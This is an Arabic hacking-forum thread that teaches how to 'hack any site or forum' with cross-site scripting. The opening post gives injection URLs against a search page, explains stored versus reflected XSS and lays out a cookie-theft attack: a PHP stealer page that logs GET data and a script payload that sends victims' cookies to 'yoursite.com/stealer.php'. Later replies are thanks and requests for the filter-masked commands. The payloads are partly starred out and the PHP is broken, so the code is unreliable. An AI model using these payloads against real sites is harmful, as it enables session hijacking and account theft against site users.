التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 08-02-2013, 07:34 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Saad Ghamdi
 

 

 
إحصائية العضو







Saad Ghamdi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Saad Ghamdi is on a distinguished road

.......... اخترق اي موقع او منتدى مع ثغرة ( xss )


بسم الله الرحمن الرحيم

اليوم نتكلم عن ثغرات ( xss ) وبنتطرق لأهم الأشياء التي يتم استغلالها وتعاريف واشياء مفيده ...

ما هي ثغرات XSS وكيف يتم اختراق الموقع بواسطة هذه الثغره

ان المواقع المصابة بثغرات ( XSS ) هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال احد الأكواد التالية :
  • javascript
  • HTML
  • PHP

اي ان ( XSS ) تعني امكانية تعديل محتويات الموقع ، ومعظم هذه الثغرات موجودة في مربعات البحث في المواقع ، وناخذ مثال على ذلك عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص

كود PHP:
www.infectedsite.com/search.php?q=word 
يكون الموقع قد كتب في صفح البحث جملة ( نتائج البحث لـ word ) , واذا ادخلنا سكربت جافا في خانة البحث كالتالي :

http://www.infectedsite.com/search.php?q=***************("XSS")</script>word

ستكتب صفحة البحث نتائج البحث لـ ( ***************("XSS")</script>word )
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة ( XSS )
هذا يعني ان الموقع مصاب بثغرة ( XSS )


لماذا يكون الموقع مصابا بثغرة ( xss )

السبب هو لأن مبرمجي الموقع كسولين جدا لفلترة كلمة البحث من الرموز التالية :
كود PHP:
 #@$%^,.<> 
وذلك لمنع إدخال الأكواد التالية :
  • javascript
  • HTML
  • PHP

هناك نوعين من ثغرات (xss )


( 1 ) اول نوع وهو النوع الدائم :
يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
حيث في مربع التعليق على احد المواقع ، ندخل كود جافا سكريبت كالتالي :


كود PHP:
 ***************("XSS")</script> 
سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة

( 2 ) النوع المؤقت :
يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث كالتالي :

كود PHP:
http://www.infectedsite.com/search.php?q=***************("XSS")</script>word 
كيف نستطيع اختراق الموقع عن طريق ثغرة ( xss )

هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات ( XSS ) ، وأهمها سرقة الكوكيز ، طبعا اكيد تحتاج الى استضافة موقع تدعم PHP , ننشئ صفحة PHP كالتالي :

كود PHP:
 stealer.php 
تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة ( GET ) الكود :

كود:
<?php
 $data=$_GET["c"]
 $f=open("*******.tct","w")
 $f.write($data)
 $f.close()
 ?>

هذه الصفحة سوف تكتب البيانات التي تردها الى ملف ( *******.txt ) والبيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :

كود PHP:
http://www.infectedsite.com/search.php?q=******************.location("http://ypursite.com/stealer.php?c="+********.******);</script> 
هنا دمجنا السكريبت :

كود PHP:
 ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script> 
هذا الكود سيحول الضحية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيم الكوكيز عن طريق الأمر :

كود:
******** . ******
هنا اذا فتحنا الملف

كود:
http://yoursite.com/*******.txt
ستجد الككيز للمستخدم مكتوبة فيها

اما في الثغرات الدائمة فيكفي ادخال الكود التالي :
كود PHP:
 ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script> 
وسبب إدخال الكود السابق لسرقة الكوكيز ، وايضا نستطيع في الثغرات الدائمة ان نحول متصفح الموقع المصاب بالثغرة ( XSS ) ،عن طريق سكريبت :

كود PHP:
 ********.location 



هذا وصلى الله وسلم على صاحب الجبين الأزهر نبينا محمد وعلى آله وصحبه اجمعين
وعيدكم مبارك وكل سنة وانتوا بصحه وعافية



hojvr hd l,ru h, lkj]n lu eyvm ( xss )

التوقيع

Don't let idiots ruin your day

 


التعديل الأخير تم بواسطة Saad Ghamdi ; 08-02-2013 الساعة 07:38 PM.

   

رد مع اقتباس
قديم 08-06-2013, 02:17 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو






عنكبوت مبدع خطير غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
عنكبوت مبدع خطير is on a distinguished road

افتراضي رد: اخترق اي موقع او منتدى مع ثغرة ( xss )


Mirce

   

رد مع اقتباس
قديم 08-07-2013, 06:02 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Saad Ghamdi
 

 

 
إحصائية العضو







Saad Ghamdi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Saad Ghamdi is on a distinguished road

. رد: اخترق اي موقع او منتدى مع ثغرة ( xss )


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة عنكبوت مبدع خطير
Mirce


اهلا وسهلا اخوي ومنور المتصفح ..


كود:
ملاحظة
حبيت من الإدارة لو تعطيني صلاحية التعديل على المواضيع عشان اضيف ( الأوامر اللتي قامت حماية المنتدى بتشفيرها ) في ملف ورفعه على رابط ليستفيد الأعضاء من الدرس ...

شاكر لكم حسن المتابعة ..
التوقيع

Don't let idiots ruin your day

 

   

رد مع اقتباس
قديم 08-07-2013, 09:14 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Spider_king
 

 

 
إحصائية العضو







Spider_king غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Spider_king is on a distinguished road

افتراضي رد: اخترق اي موقع او منتدى مع ثغرة ( xss )


MERCII

   

رد مع اقتباس
قديم 08-07-2013, 03:13 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: اخترق اي موقع او منتدى مع ثغرة ( xss )


بارك الله فيك اخي واتمنى ان ترسل الموضوع في txt واقوم بالتعديل عليه
للحماية من الكلمات المشفره
في الموضوع

وكل عام والامه العربيه بخير ان شاء الله

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

رد مع اقتباس
قديم 08-07-2013, 08:00 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Saad Ghamdi
 

 

 
إحصائية العضو







Saad Ghamdi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Saad Ghamdi is on a distinguished road

. رد: اخترق اي موقع او منتدى مع ثغرة ( xss )


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Cyber Mafia
بارك الله فيك اخي واتمنى ان ترسل الموضوع في txt واقوم بالتعديل عليه
للحماية من الكلمات المشفره
في الموضوع

وكل عام والامه العربيه بخير ان شاء الله


شاكر لك اهتمامك وردك على الموضوع + يوجد موضوع في قسم الإشراف لو تمر عليه اكون ممتن لك

تم ارسال ملف ( text ) على البروفيال الخاص فيك بالاوامر اللتي قامت حماية المنتدى بتشفيرها ...
التوقيع

Don't let idiots ruin your day

 

   

رد مع اقتباس
قديم 08-25-2013, 03:55 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو







ahmedaljubory غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ahmedaljubory is on a distinguished road

افتراضي رد: اخترق اي موقع او منتدى مع ثغرة ( xss )


شكرا للشرح

   

رد مع اقتباس
قديم 02-19-2014, 06:36 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو






جبروت هكر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
جبروت هكر is on a distinguished road

افتراضي رد: اخترق اي موقع او منتدى مع ثغرة ( xss )


بارك الله فيك..

واصل ابداعك 😎
التوقيع


اكثرو من الاستغفار

**
لاتحقرن كيد الضعيف فربما تموت الأسود من سم العناكبي
**

http://im28.gulfup.com/2012-06-01/1338577781521.jpg

 

   

رد مع اقتباس
قديم 02-27-2014, 11:13 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو







InJuries Yemen غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
InJuries Yemen is on a distinguished road

افتراضي رد: اخترق اي موقع او منتدى مع ثغرة ( xss )


يسسلمو يا بطل

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
ثغرة, xss

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 03:15 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0